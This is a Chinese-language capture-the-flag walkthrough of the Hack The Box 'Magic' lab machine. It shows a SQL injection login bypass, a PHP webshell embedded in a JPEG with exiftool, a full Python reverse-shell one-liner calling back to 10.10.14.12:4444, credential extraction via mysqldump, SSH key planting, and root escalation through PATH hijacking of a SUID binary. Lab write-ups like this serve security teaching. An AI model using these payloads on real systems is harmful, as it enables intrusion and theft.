靶机简介

图片

靶机名:Magic
OS:Linux
难度:中等
靶机IP:10.10.10.185

运用到的知识

SQL万能密码原理
mysqldump备份数据库
sysinfo利用lshw提权

解题过程

首先拿到靶机IP先对他进行端口扫描:

1
nmap -A 10.10.10.185 -T4

图片

发现了靶机开放了22(ssh)、80(http)服务,其他的端口被过滤了,我们先从web服务开始下手吧:(发现是一个图片托管站点)

图片

打开后发现了一个登陆点:http://10.10.10.185/login.php

常规弱口令尝试了一遍失败了:

图片

万能密码登陆后台GetSHELL

后来发现这是PHP的站,随后一个万能密码就登陆进去了:(#SQL中代表注释,也就是说我们只需要输入正确的账号#,就能成功登陆)

图片

登陆成功后来到了一个上传点:http://10.10.10.185/upload.php

图片

之后我制作了一个图片马:(得安装一下exiftool这个工具)

1
2
3
4
5
#写入一句话到 saul.jpg
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' saul.jpg

#复制一个saul.php.jpg文件
cp saul.jpg saul.php.jpg

图片

然后上传 saul.php.jpg 图片马成功GetSHELL

图片

随后利用python反弹shellnc

1
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

图片

之后先得到一个 bash 外壳,不然 sh 外壳很难受:

1
/bin/bash -i

图片

随后切换到网站根目录发现了一个配置文件里面有账号和密码:

1
2
3
4
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';

图片

然而我查看 passwd 文件发现也有这个账号:

图片

猜测有可能会撞库,ssh 的账号有可能和配置文件的账号密码是一样的,我们先 su 切换一下用户:

图片

发现提示:su: must be run from a terminal

之后Google了一下发现有类似情况:su: must be run from a terminal

发现可以用这个绕过:

1
2
$ echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
$ python3 /tmp/asdf.py

图片

虽然是绕过了,但是还是登陆失败!

备份数据库发现密码

之后用 mysqldump 备份了一下数据库发现了一些信息:

1
mysqldump -utheseus -piamkingtheseus Magic

图片

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
www-data@ubuntu:/var/www/Magic$ mysqldump -utheseus -piamkingtheseus Magic
mysqldump -utheseus -piamkingtheseus Magic
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost Database: Magic
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
`id` int(6) NOT NULL AUTO_INCREMENT,
`username` varchar(50) NOT NULL,
`password` varchar(100) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-04-21 19:34:38
www-data@ubuntu:/var/www/Magic$

我们得到了一个敏感的插入字段的SQL语句从而又得到了一个账号密码:

1
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');

使用 su 切换到 theseus 用户使用刚刚得到的密码登陆成功:

图片

之后在用户home目录下拿到 user.txt

图片

sysinfo权限提升root

这个时候就先想办法登陆到它的ssh,我先是在本地kali生成了一个ssh公钥

1
ssh-keygen

图片

1
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9DpODZcrjmZeJaBpvd1Jb2a+liQdQfoSA/ld4BeEZtoVeFbCm8Uhq1SgVV9q9Mjqp0EKvxmDlZzyYkT+cc9c7ffI2aqUuZlg+B1KZ5tWfdP6NN6EGaDE5aFoKWRlvIaHFTftcnTRvuh3hF9CAX2f5GtLdQ5EAB+LyYbi+EaYKNzkk8/Dp7XVQXk+hm5vRkATNN0cxaZjbv6/L6CTyI4ZPcqio+X2mMz9G4j7e7vdpik10TDIWebLAir/9rkJtkCkMawIOddug8ajHbcvFhokXCuYTcWXHKkuvo0zRiAhyoeMK9f8Hb5DfMZhrNPm0xHaK5bkMOmUlUOtLV8w7k2aCkZ+Cm+uLdVeh409GrlddNPsyD3Qi9gGbPbd+SlOlvvBqEcnQXQdWXHmd6KLbs4syiemiLbxRDizEVKL6hF7AumCpl84/6MUAfbmKZc6COrC4qynyS6xTuU1OS5UsS3dTna8v6o8bcrbIDL0GZIYfhbcomyKHvzkSDiihxGdSYU0= root@kali

之后再靶机上echo 这个 id_rsa.pub一个公钥命名为authorized_keys(这个文件用于连接SSH):

1
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9DpODZcrjmZeJaBpvd1Jb2a+liQdQfoSA/ld4BeEZtoVeFbCm8Uhq1SgVV9q9Mjqp0EKvxmDlZzyYkT+cc9c7ffI2aqUuZlg+B1KZ5tWfdP6NN6EGaDE5aFoKWRlvIaHFTftcnTRvuh3hF9CAX2f5GtLdQ5EAB+LyYbi+EaYKNzkk8/Dp7XVQXk+hm5vRkATNN0cxaZjbv6/L6CTyI4ZPcqio+X2mMz9G4j7e7vdpik10TDIWebLAir/9rkJtkCkMawIOddug8ajHbcvFhokXCuYTcWXHKkuvo0zRiAhyoeMK9f8Hb5DfMZhrNPm0xHaK5bkMOmUlUOtLV8w7k2aCkZ+Cm+uLdVeh409GrlddNPsyD3Qi9gGbPbd+SlOlvvBqEcnQXQdWXHmd6KLbs4syiemiLbxRDizEVKL6hF7AumCpl84/6MUAfbmKZc6COrC4qynyS6xTuU1OS5UsS3dTna8v6o8bcrbIDL0GZIYfhbcomyKHvzkSDiihxGdSYU0= root@kali" > authorized_keys

图片

紧接着在KALI连接SSH公钥:

1
ssh -i /root/.ssh/id_rsa theseus@10.10.10.185

图片

登陆成功后我在 /bin 目录下发现了一个 sysinfo 引起了我的注意(有root权限):

图片

之后我在本机KALI开启一个web服务用于上传文件:

1
python -m SimpleHTTPServer 9000

图片

我们的 lshw 文件 是 Linux 下一个可以查看硬件信息的文件,然后我建立的 lshw 文件是一个python的反向连接nc的payload:

图片

这样目标在运行了这个文件那么我们就会反弹shell到nc从而进行权限提升!

随后在目标靶机上下载lshw

1
wget 10.10.14.12:9000/lshw

图片

最后设置环境变量为lshw所在的目录:

1
export PATH=/tmp/saul:$PATH

nc 监听端口 4444,然后运行 sysinfo 成功反弹root权限的shell

图片

图片

之后让它得到一个bash外壳:

1
/bin/bash -i

图片

最后也是在 /root 目录拿到 root.txt 完成这次靶机演练!